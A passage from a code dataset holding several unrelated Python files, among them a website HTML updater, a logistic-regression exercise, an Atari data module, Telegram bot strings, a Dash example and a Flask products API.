\\n\\n'\n\n\nfor file_html in onlyfiles:\n\tpage=open(path_webiste+file_html,'r').read()\n\tpage=page.replace('#banner { background: #bdbdbd; height:200px;','#banner { background: #bdbdbd; height:225px;')\n\tpage=page.replace(header,header+search_box)\n\topen(path_webiste+file_html,'w').write(page)\n\n\n############################################################\n\n\nfor file_html in onlyfiles:\n\thog=file_html.split('.')[0]\n\tprint(hog)\n\t# get link for GitHub suggestion\n\turl_aybrah='https://kcorreia.github.io/aybrah/website/'+hog+'.html'\n\turl_github='https://github.com/kcorreia/aybrah/issues/new?body=%23%20Description%20of%20the%20issue%0A%0A%0A%0A%23%20Page%0A'+url_aybrah\n\tpage=open(path_webiste+file_html,'r').read()\n\tpage=page.replace('',''+hog+'')\n\tpage=page.replace('#banner { background: #bdbdbd; height:225px;','#banner { background: #bdbdbd; height:265px;')\n\tpage=page.replace('Phobius predictions','Phobius predictions

\\n'+'\\t'*17+'Report suggestion on GitHub')\n\topen(path_webiste+file_html,'w').write(page)\n\n\n\n\n\n","repo_name":"LMSE/aybrah","sub_path":"scripts/update_hog_webpage.py","file_name":"update_hog_webpage.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21449803354","text":"#reading h5 file\nimport numpy as np\nimport h5py\n \n \ndef load_dataset():\n train_dataset = h5py.File('drive/My Drive/train_catvnoncat.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) # your train set features\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) # your train set labels\n\n test_dataset = h5py.File('drive/My Drive/test_catvnoncat.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:]) # your test set features\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) # your test set labels\n\n classes = np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n \n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n \n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n \ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n \nm_train=train_set_x_orig.shape[0] #num of training examples\nm_test=test_set_x_orig.shape[0] #no. of test exapmples\nnum_px=train_set_x_orig.shape[1] #width of training ex (width of image )\n\nprint(\"Num of training examples : \",m_train)\nprint(\"Num of test examples : \",m_test)\nprint(\"Num of training labels : \",num_px)\nprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\nprint(\"shape of train__set\",train_set_x_orig.shape)\nprint(\"shape of train_Y_set\",train_set_y.shape)\nprint(\"shape of test__set\",test_set_x_orig.shape)\n\n#Now reshape the training examples\ntrain_x_flatten=train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T #create a matrix of nx(64x64x3) X m\ntest_x_flatten=test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T\n\nprint (\"train_set_x_flatten shape: \" + str(train_x_flatten.shape))\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\nprint (\"test_set_x_flatten shape: \" + str(test_x_flatten.shape))\nprint (\"test_set_y shape: \" + str(test_set_y.shape))\n\ntrain_set_x = train_x_flatten/255. #to standardize the pixel values\ntest_set_x = test_x_flatten/255.\n\n# GRADED FUNCTION: sigmoid\n\ndef sigmoid(z):\n\n\n s =1/(1+np.exp(-z))\n\n \n return s\n \n # initialize_with_zeros\ndef initialize(dim):\n \n \n \n w = np.random.randn(dim,1)*0.1\n b = 0\n \n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int))\n \n return w, b\n \ndef propagate(w, b, X, Y):\n\n \n m = X.shape[1]\n \n \n A = sigmoid(np.dot(w.T,X)+b) # compute activation\n cost =(-1/m) *(np.sum(Y*np.log(A)+(1-Y)*np.log(1-A))) # compute cost\n \n \n # BACKWARD PROPAGATION (TO FIND GRAD)\n \n dw =(1/m)*np.dot(X,(A-Y).T)\n db = (1/m)*(np.sum(A-Y))\n \n\n assert(dw.shape == w.shape) #assert=>to make sure of dimensions are correct\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return grads, cost\n \ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False):\n\n \n costs = []\n \n for i in range(num_iterations):\n \n \n # Cost and gradient calculation (≈ 1-4 lines of code)\n \n grads, cost =propagate(w,b,X,Y)\n \n \n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n # update rule (≈ 2 lines of code)\n \n w =w-learning_rate*dw\n b =b-learning_rate*db\n \n \n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n \n # Print the cost every 100 training iterations\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n \n params = {\"w\": w,\n \"b\": b}\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return params, grads, costs\n \ndef predict(w, b, X):\n \n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0], 1)\n \n # Compute vector \"A\" predicting the probabilities of a cat being present in the picture\n\n A = sigmoid(np.dot(w.T,X)+b)\n \n \n for i in range(A.shape[1]):\n \n # Convert probabilities A[0,i] to actual predictions p[0,i]\n \n Y_prediction[0,i]=1 if A[0,i]>0.5 else 0\n\n \n assert(Y_prediction.shape == (1, m))\n \n return Y_prediction\n \n \ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False):\n\n # d -- dictionary containing information about the model.\n \n \n \n \n # initialize parameters with zeros\n w, b = initialize_with_zeros(X_train.shape[0])\n\n # Gradient descent \n parameters, grads, costs = optimize(w,b,X_train,Y_train,num_iterations,learning_rate,print_cost)\n \n # Retrieve parameters w and b from dictionary \"parameters\"\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n # Predict test/train set examples \n Y_prediction_test = predict(w,b,X_test)\n Y_prediction_train = predict(w,b,X_train)\n\n \n\n # Print train/test Errors\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n\n \n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test, \n \"Y_prediction_train\" : Y_prediction_train, \n \"w\" : w, \n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n \n return d\n \nd = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True)\n","repo_name":"Nagrajpawar05/Logistic_regression_NN_mindset","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5845995606","text":"\"\"\"\n\nWhat is the sum of the digits of the number 2**N?\n\n\"\"\"\n\ndef digits_sum(n):\n pn = 2**n\n return sum(int(ch) for ch in str(pn))\n\n\ndef hacker_main():\n t = int(input())\n for _ in range(t):\n n = int(input())\n result = digits_sum(n)\n print(result)\n\n\n# print(digits_sum(1000))\nhacker_main()","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_001_050/P016_PowerDigitSum.py","file_name":"P016_PowerDigitSum.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40069197871","text":"from abc import ABC\nfrom math import ceil, floor\nfrom typing import Union, Optional, Any, List\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.utils\nfrom rich.progress import track, Progress\nfrom torch.utils.data import DataLoader\nfrom argparse import ArgumentParser\n\nimport buffer_h5 as b5\nfrom sampler import SamplerFactory\nimport numpy as np\nfrom torchvision import transforms\nfrom transforms import GaussianBlur\nimport h5py as h5\nfrom time import time\nimport math\n\nclass H5NextStateReward(b5.Buffer, torch.utils.data.Dataset, ABC):\n REWARD_NEG: int = 0\n REWARD_POS: int = 1\n\n def __init__(self):\n super().__init__()\n self.transforms = None\n self.classes = []\n self.image_shape = None\n self.image_dtype = None\n self.class_index = None\n self.reward_causality_distance = 5\n\n def load(self, filename, mode='r', cache_bytes=1073741824, cache_slots=100000, cache_w0=0.0, reward_causality_distance=5):\n super().load(filename, mode, cache_bytes, cache_slots, cache_w0)\n self.reward_causality_distance = reward_causality_distance\n self.classes = np.zeros(self.steps, dtype=np.int64)\n initials = self.episodes[:self.num_episodes]\n initials_mask = np.zeros(self.steps, dtype=np.uint8)\n initials_mask[initials] = 1\n initials_mask = initials_mask.astype(np.bool_)\n reward_pos_mask = self.reward[:self.steps] > 0.0\n self.image_shape = *self.f['/replay/raw'].shape[1:3], self.f['/replay/raw'].shape[3]*2\n self.image_dtype = self.f['/replay/raw'].dtype\n\n \"\"\"\n When we hit a reward, flag the states that lead up to it as rewarding\n but not if they are from a different trajectory!\n \"\"\"\n counter = 0\n for i in track(reversed(range(self.steps)), total=self.steps, description='[blue]indexing'):\n r = reward_pos_mask[i]\n initial = initials_mask[i]\n if r:\n counter = reward_causality_distance + 1\n if counter > 0:\n reward_pos_mask[i] = True\n if initial:\n counter = 0\n else:\n counter -= 1\n\n rewards_pos, = np.where(reward_pos_mask)\n rewards_neg, = np.where(reward_pos_mask == False)\n self.classes = reward_pos_mask.astype(dtype=np.int64)\n self.class_index = [rewards_neg, rewards_pos]\n\n def make_stat_table(self):\n table = super().make_stat_table()\n table.add_row(\"Reward causality distance\", f'{self.reward_causality_distance}')\n table.add_row(\"Labeled reward_pos\", f\"{np.count_nonzero(self.classes)}\")\n return table\n\n def __len__(self):\n return self.n_gram_len(gram_len=1)\n\n def __getitem__(self, item):\n raw = self.raw[item]\n grad = self.replay['grad'][item]\n image = np.concatenate((raw, grad), axis=2)\n x = self.transforms(image)\n label = self.classes[item]\n return x, label\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return 2\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return ['non-reward', 'reward']\n\n\nclass PolicyActionLabels(b5.Buffer, torch.utils.data.Dataset, ABC):\n def __init__(self):\n super().__init__()\n self.transforms = None\n self.classes = None\n self.class_index = None\n self.image_shape = None\n self.image_dtype = None\n\n def build_class_index(self):\n with Progress() as p:\n task = p.add_task(description='[blue] indexing ...', total=self.steps)\n idx = [[] for _ in range(self.num_classes)]\n for i in range(self.steps):\n idx[self.action[i]].append(i)\n p.update(task, total=self.steps, advance=1)\n return idx\n\n def load(self, filename, mode='r', cache_bytes=1073741824, cache_slots=100000, cache_w0=0.0, reward_causality_distance=5):\n super().load(filename, mode, cache_bytes, cache_slots, cache_w0)\n self.classes = self.action[:]\n self.class_index = self.build_class_index()\n self.image_shape = *self.f['/replay/raw'].shape[1:3], self.f['/replay/raw'].shape[3]*2\n self.image_dtype = self.f['/replay/raw'].dtype\n\n def make_stat_table(self):\n table = super().make_stat_table()\n return table\n\n def __len__(self):\n return self.n_gram_len(gram_len=1)\n\n def __getitem__(self, item):\n raw = self.raw[item]\n grad = self.replay['grad'][item]\n image = np.concatenate((raw, grad), axis=2)\n x = self.transforms(image)\n action = self.classes[item]\n return x, action\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return 4\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return ['NOP', 'FIRE', 'RIGHT', 'LEFT']\n\n\ndef split_index(class_index):\n \"\"\"\n\n :param class_index: nested lists of indexes of each class\n ie for classes\n labels = [1, 2, 0, 1, 2, 0, 0]\n class_index = [[2, 5, 6], [0, 3], [1, 4]]\n :return: test and validation splits with same proportion of clesses, in same format as class_index\n \"\"\"\n train, val = [], []\n for i in range(len(class_index)):\n class_i = class_index[i]\n train.append(class_i[:ceil(len(class_i) * 0.8)])\n val.append(class_i[floor(len(class_i) * 0.8):])\n return train, val\n\n\ndef write_samples(group, dataset, class_dict, class_index, image_shape, chunk_size, num_chunks, compression,\n compression_opts):\n\n sampler = SamplerFactory().get(\n class_idxs=class_index,\n batch_size=chunk_size,\n n_batches=num_chunks,\n alpha=0.5,\n kind='fixed'\n )\n\n len = chunk_size * num_chunks\n\n group.create_dataset('image',\n shape=(len, *dataset.image_shape),\n chunks=(chunk_size, *dataset.image_shape),\n dtype=dataset.image_dtype,\n compression=compression,\n compression_opts=compression_opts,\n shuffle=False\n )\n group.create_dataset('label',\n shape=(len,),\n chunks=(chunk_size,),\n dtype=h5.enum_dtype(class_dict, basetype=np.int64),\n compression=compression,\n compression_opts=compression_opts,\n shuffle=False\n )\n\n with Progress() as p:\n task = p.add_task(description=f'[red] writing {group.name}', total=num_chunks)\n for i, (image, cls) in enumerate(DataLoader(dataset, batch_sampler=sampler, num_workers=0)):\n offset = i * chunk_size\n group['image'][offset:offset + chunk_size] = image.numpy()\n group['label'][offset:offset + chunk_size] = cls.numpy()\n p.update(task, total=num_chunks, advance=1)\n\n\ndef write_balanced_splits(dataset, dest_filename, class_dict, chunk_size, num_chunks, compression, compression_opts):\n\n train_class_index, val_class_index = split_index(dataset.class_index)\n f = h5.File(dest_filename, mode='w')\n train = f.create_group('train')\n write_samples(train, dataset, class_dict, train_class_index, dataset.image_shape, chunk_size, num_chunks, compression,\n compression_opts)\n val = f.create_group('val')\n write_samples(val, dataset, class_dict, val_class_index, dataset.image_shape, chunk_size, num_chunks // 10, compression,\n compression_opts)\n\n\nclass H5ImageLabelIterableDataset(torch.utils.data.IterableDataset):\n def __init__(self, filename, group, transform, batch_size, num_workers):\n \"\"\"\n\n :param filename:\n :param group: 'train' or 'val' will load train or validation set respectively\n :param transform:\n :param batch_size:\n \"\"\"\n super().__init__()\n self.filename = filename\n self.group = group\n self.f = h5.File(self.filename, mode='r')\n self.offset = 0\n self.batch_size = batch_size\n self.transform = transform\n self.num_workers = num_workers\n\n def __iter__(self):\n return self\n\n def __next__(self):\n g = self.f[self.group]\n\n start = self.offset\n end = self.offset + self.batch_size\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is None: # single-process data loading, return the full iterator\n iter_start = start\n iter_end = end\n else: # in a worker process\n # split workload\n per_worker = int(math.ceil((end - start) / float(worker_info.num_workers)))\n worker_id = worker_info.id\n iter_start = start + worker_id * per_worker\n iter_end = min(iter_start + per_worker, end)\n\n start = time()\n images = g['image'][iter_start:iter_end]\n labels = g['label'][iter_start:iter_end]\n load = time()\n images = list(zip(*[self.transform(image) for image in images]))\n x = tuple([torch.stack(items) for items in images])\n transform = time()\n #print(f'start: {iter_start} end:{iter_end} load: {load-start} transform: {transform-load}')\n self.offset += self.batch_size\n if self.offset > len(g['image']):\n raise StopIteration\n return x, labels\n\n def __len__(self):\n # because we the batch size in the loader == the number of workers\n # we must fist multiply be the number of workers then divide by the actual batch size\n # (yes this is confusing)\n g = self.f[self.group]\n return len(g['label']) * self.num_workers // self.batch_size\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return len(self.name_classes)\n\n @property\n def name_classes(self) -> List[str]:\n with h5.File(self.filename, mode='r') as f:\n g = f[self.group]\n return list(g['label'].dtype.metadata['enum'])\n\n\nclass H5ImageLabelDataset(torch.utils.data.Dataset):\n def __init__(self, filename, group, transform, batch_size):\n \"\"\"\n\n :param filename:\n :param group: 'train' or 'val' will load train or validation set respectively\n :param transform:\n :param batch_size: not used\n \"\"\"\n super().__init__()\n self.filename = filename\n self.f = h5.File(filename, mode='r')\n self.g = self.f[group]\n self.offset = 0\n self.transform = transform\n\n def __getitem__(self, item):\n start = time()\n image = self.g['image'][item]\n label = self.g['label'][item]\n fetch = time()\n x = self.transform(image)\n transform = time()\n #print(fetch-start, transform-fetch)\n return x, label\n\n def __len__(self):\n return len(self.g['label'])\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return len(self.name_classes)\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return list(self.g['label'].dtype.metadata['enum'])\n\n\nclass AtariDataModule(pl.LightningDataModule):\n def __init__(self, filename, train_transforms, val_transforms, test_transforms,\n val_split: Union[int, float] = 0.2,\n num_workers: int = 0,\n normalize: bool = False,\n batch_size: int = 32,\n seed: int = 42,\n shuffle: bool = False,\n pin_memory: bool = False,\n drop_last: bool = False,\n batches_per_epoch: int = 1024\n ):\n super().__init__(train_transforms, val_transforms, test_transforms)\n self.buffer = None\n self.train_set = None\n self.val_set = None\n self.val_split = val_split\n self.num_workers = num_workers\n self.normalize = normalize\n self.batch_size = batch_size\n self.batches_per_epoch = batches_per_epoch\n self.seed = seed\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.val_sampler = None\n self.train_sampler = None\n\n self.train_set = H5ImageLabelIterableDataset(filename, 'train', train_transforms, batch_size=batch_size, num_workers=num_workers)\n #self.train_set = H5ImageLabelDataset(filename, 'train', train_transforms, batch_size=batch_size)\n self.train_set.transforms = self.train_transforms\n\n self.val_set = H5ImageLabelIterableDataset(filename, 'val', val_transforms, batch_size=batch_size, num_workers=num_workers)\n #self.val_set = H5ImageLabelDataset(filename, 'val', val_transforms, batch_size=batch_size)\n self.val_set.transforms = self.val_transforms\n\n\n def _collate(self, worker_data):\n xb, yb, zb, labels = [], [], [], []\n for (x, y, z), l in worker_data:\n xb.append(x)\n yb.append(y)\n zb.append(z)\n labels.append(l)\n xb = torch.cat(xb, dim=0)\n yb = torch.cat(yb, dim=0)\n zb = torch.cat(zb, dim=0)\n labels = torch.from_numpy(np.concatenate(labels, axis=0))\n return (xb, yb, zb), labels\n\n def _data_loader(self, dataset: torch.utils.data.Dataset) -> torch.utils.data.DataLoader:\n return torch.utils.data.DataLoader(\n dataset,\n batch_size=self.num_workers,\n num_workers=self.num_workers,\n pin_memory=False,\n shuffle=False,\n collate_fn=self._collate,\n prefetch_factor=1,\n )\n\n def train_dataloader(self, *args: Any, **kwargs: Any) -> DataLoader:\n \"\"\" The train dataloader \"\"\"\n return self._data_loader(self.train_set)\n\n def val_dataloader(self, *args: Any, **kwargs: Any) -> Union[DataLoader, List[DataLoader]]:\n \"\"\" The val dataloader \"\"\"\n return self._data_loader(self.val_set)\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return self.train_set.num_classes\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return self.train_set.name_classes\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--source_filename', required=True)\n parser.add_argument('--chunk_size', required=True, type=int)\n parser.add_argument('--dest_filename', required=True)\n parser.add_argument('--compression_opts', type=int, default=6)\n parser.add_argument('--dataset', choices=['reward', 'action'], required=True)\n args = parser.parse_args()\n\n def identity(x):\n return x\n\n if args.dataset == 'reward':\n ds = H5NextStateReward()\n ds.transforms = identity\n ds.load(args.source_filename)\n\n elif args.dataset == 'action':\n ds = PolicyActionLabels()\n ds.transforms = identity\n ds.load(args.source_filename)\n else:\n raise Exception\n\n class_dict = dict(zip(ds.name_classes, range(len(ds.name_classes))))\n num_chunks = len(ds) // args.chunk_size\n write_balanced_splits(ds, dest_filename=args.dest_filename, class_dict=class_dict,\n chunk_size=args.chunk_size, num_chunks=num_chunks,\n compression='gzip', compression_opts=args.compression_opts)","repo_name":"DuaneNielsen/barlow_twins","sub_path":"datamodule.py","file_name":"datamodule.py","file_ext":"py","file_size_in_byte":15731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28057452103","text":"from pyrogram.types import InlineKeyboardButton\nfrom creds import cred\n\nwelcome = \"\\nЁЯФе Give me the subtitle file you want to translate.\\n\\nЁЯП╡я╕П Join & тЭдя╕П support @PF_HW\\n\\nЁЯП╡я╕П Tv/Web series @PF_TV\"\nabout = (\n \"ЁЯНО Channel : [PF HW](t.me/PF_HW)\\nЁЯСитАНЁЯТ╗ Creater: [ сНХр╣П╧З╔к╧▓ ╔пр╣П╩Е╧Э ](t.me/Ab_wolf)\\nтЪбя╕П Language: [\"\n \"Python3](https://python.org)\\nЁЯУж Library : [Pyrogram](https://docs.pyrogram.org/) \\nЁЯТа Server : [Heroku](\"\n \"https://herokuapp.com/) \"\n)\nhelp_text = (\n \"**Steps to follow**\\n\\n`This is a subtitle translator bot`\\n**1.** `Send me the subtitle file inorder to \"\n \"translate.`\\n**2.** `Select the destination language(dont press multiple buttons).`\\n**3.** `Wait some time \"\n \"to complete the translation.`\\n\\n**Keep in mind**\\n\\n**1.** `You can only translate one subtitle at a \"\n \"time`\\n**2.** `Dont forward bulk files together , You will be banned` \"\n)\neta_text = (\n \"**File name :** `{}`\\n**Done** `{}` **of** `{}`\\n**Percentage:** {}%\\n**Speed:** {} lines/sec\\n**ETA:** {}\\n[{\"\n \"}{}] \"\n)\ncaption = f\"ЁЯе║ Please join @PF_HW\"\nempty = \"ЁЯдФ You need to send a subtitle (srt) file inorder to translate it \"\nmmtypes = [\n \"text/plain\",\n \"application/x-subrip\",\n \"application/octet-stream\",\n \"application/binary\",\n]\nerr1 = \"**__One subtitle is processing wait sometime__**\"\nerr2 = \"**__This is not a subtitle(srt) file__**\"\nerr3 = \"**Todays limit exceeded**\"\nerr4 = \"**Unsupported characters in file**\"\nerr5 = \"**Some errors happened Try again..**\"\n\nlangs = [\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р┤ор┤▓р┤пр┤╛р┤│р┤В\", callback_data=\"Malayalam\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ родрооро┐ро┤рпН\", callback_data=\"Tamil\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рд╣рд┐рдиреНрджреА\", callback_data=\"Hindi\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р▓Хр▓ир│Нр▓ир▓б\", callback_data=\"Kannada\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р░др▒Жр░▓р▒Бр░Чр▒Б\", callback_data=\"Telugu\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рдорд░рд╛рдареА\", callback_data=\"Marathi\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ ркЧрлБркЬрк░рк╛ркдрлА\", callback_data=\"Gujarati\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рмУрмбрм╝рм┐рмЖ\", callback_data=\"Odia\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ ржмрж╛ржВрж▓рж╛\", callback_data=\"bn\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рикрй░риЬри╛римрйА\", callback_data=\"Punjabi\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ╖ ┘Б╪з╪▒╪│█М\", callback_data=\"Persian\"),\n InlineKeyboardButton(\"ЁЯЗ║ЁЯЗ▓ English\", callback_data=\"English\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗкЁЯЗ╕ espa├▒ol\", callback_data=\"Spanish\"),\n InlineKeyboardButton(\"ЁЯЗлЁЯЗ╖ fran├зais\", callback_data=\"French\"),\n InlineKeyboardButton(\"ЁЯЗ╖ЁЯЗ║ ╤А╤Г╤Б╤Б╨║╨╕╨╣\", callback_data=\"Russian\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ▒ ╫в╓┤╫С╫и╓┤╫Щ╫к\", callback_data=\"hebrew\"),\n InlineKeyboardButton(\"ЁЯЗжЁЯЗк ╪з┘Д╪╣╪▒╪и┘К╪й\", callback_data=\"arabic\"),\n ],\n]\n","repo_name":"TharukRenuja/SubtitleTranslator-Bot","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31508210939","text":"import json\nfrom textwrap import dedent as d\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nstyles = {\n 'pre': {\n 'border': 'thin lightgrey solid',\n 'overflowX': 'scroll'\n }\n}\n\napp.layout = html.Div([\n dcc.Graph(\n id='basic-interactions',\n figure={\n 'data': [\n {\n 'x': [1, 2, 3, 4],\n 'y': [4, 1, 3, 5],\n 'text': ['a', 'b', 'c', 'd'],\n 'customdata': ['c.a', 'c.b', 'c.c', 'c.d'],\n 'name': 'Trace 1',\n 'mode': 'markers',\n 'marker': {'size': 12}\n },\n {\n 'x': [1, 2, 3, 4],\n 'y': [9, 4, 1, 4],\n 'text': ['w', 'x', 'y', 'z'],\n 'customdata': ['c.w', 'c.x', 'c.y', 'c.z'],\n 'name': 'Trace 2',\n 'mode': 'markers',\n 'marker': {'size': 12}\n }\n ],\n 'layout': {\n 'clickmode': 'event+select'\n }\n }\n ),\n\n html.Div(className='row', children=[\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Hover Data**\n\n Mouse over values in the graph.\n \"\"\")),\n html.Pre(id='hover-data', style=styles['pre'])\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Click Data**\n\n Click on points in the graph.\n \"\"\")),\n html.Pre(id='click-data', style=styles['pre']),\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Selection Data**\n\n Choose the lasso or rectangle tool in the graph's menu\n bar and then select points in the graph.\n\n Note that if `layout.clickmode = 'event+select'`, selection data also \n accumulates (or un-accumulates) selected data if you hold down the shift\n button while clicking.\n \"\"\")),\n html.Pre(id='selected-data', style=styles['pre']),\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Zoom and Relayout Data**\n\n Click and drag on the graph to zoom or click on the zoom\n buttons in the graph's menu bar.\n Clicking on legend items will also fire\n this event.\n \"\"\")),\n html.Pre(id='relayout-data', style=styles['pre']),\n ], className='three columns')\n ])\n])\n\n@app.callback(\n Output('hover-data', 'children'),\n [Input('basic-interactions', 'hoverData')])\ndef display_hover_data(hoverData):\n return json.dumps(hoverData, indent=2)\n\n\n@app.callback(\n Output('click-data', 'children'),\n [Input('basic-interactions', 'clickData')])\ndef display_click_data(clickData):\n return json.dumps(clickData, indent=2)\n\n\n@app.callback(\n Output('selected-data', 'children'),\n [Input('basic-interactions', 'selectedData')])\ndef display_selected_data(selectedData):\n return json.dumps(selectedData, indent=2)\n\n\n@app.callback(\n Output('relayout-data', 'children'),\n [Input('basic-interactions', 'relayoutData')])\ndef display_selected_data(relayoutData):\n return json.dumps(relayoutData, indent=2)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","repo_name":"uwescience/ADUniverse","sub_path":"examples/dash_multipanel.py","file_name":"dash_multipanel.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"1268193962","text":"from flask import *\nfrom flask_restful import reqparse, Resource\n#import werkzeug\nfrom login import loginRequired\nfrom werkzeug.utils import secure_filename\n\nfrom core import Core\n\npostargs = reqparse.RequestParser()\n\npostargs.add_argument('name', type=str, required=True)\npostargs.add_argument('amount', type=int, required=True)\npostargs.add_argument('quantity', type=int, required=True)\n\nclass Products(Resource):\n \n def __init__(self):\n pass\n\t \n def post(self):\n #curl cmd : curl -i -H \"Content-Type: application/json\" -X POST -d \"{\\\"name\\\" : \\\"Coca Cola 500 mL\\\", \\\"amount\\\" : 60, \\\"quantity\\\" : 10}\" http://127.0.0.1:8888/qrcode/products\n prdct_info = postargs.parse_args()\n prdct_info['product_id'] = Core.get_instance().create_random(5)\n Core.get_instance().write_data_to_product_db(prdct_info)\n msg = 'Product information posted successfully' #% (poolName)\n return {'status': \"true\", 'message': msg}, 201\n\n def get(self):\n #curl cmd : curl -i -H \"Content-Type: application/json\" -X GET http://127.0.0.1:8888/qrcode/products\n product_data = Core.get_instance().read_data_from_product_db()\n datadict = {}\n datalist = []\n for data in product_data:\n #print '%s' %data\n #print data['name'],data['quantity'],data['amount'],data['product_id']\n datadict[\"Product name\"] = data['name']\n datadict[\"Quantity\"] = data['quantity']\n datadict[\"Amount\"] = data['amount']\n datadict[\"Product_id\"] = data['product_id']\n datalist.append(datadict.copy())\n return datalist\n\n\n \n","repo_name":"learn-coding/QRCode","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17490922218","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.utils import to_categorical\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport argparse\r\nimport random\r\nimport cv2\r\nimport os\r\nfrom skimage import io\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers.convolutional import Conv2D\r\nfrom keras.layers.convolutional import MaxPooling2D\r\nfrom keras.layers.core import Activation\r\nfrom keras.layers.core import Flatten\r\nfrom keras.layers.core import Dense\r\nfrom keras import backend as K\r\nfrom keras.utils.vis_utils import plot_model\r\nfrom skimage import 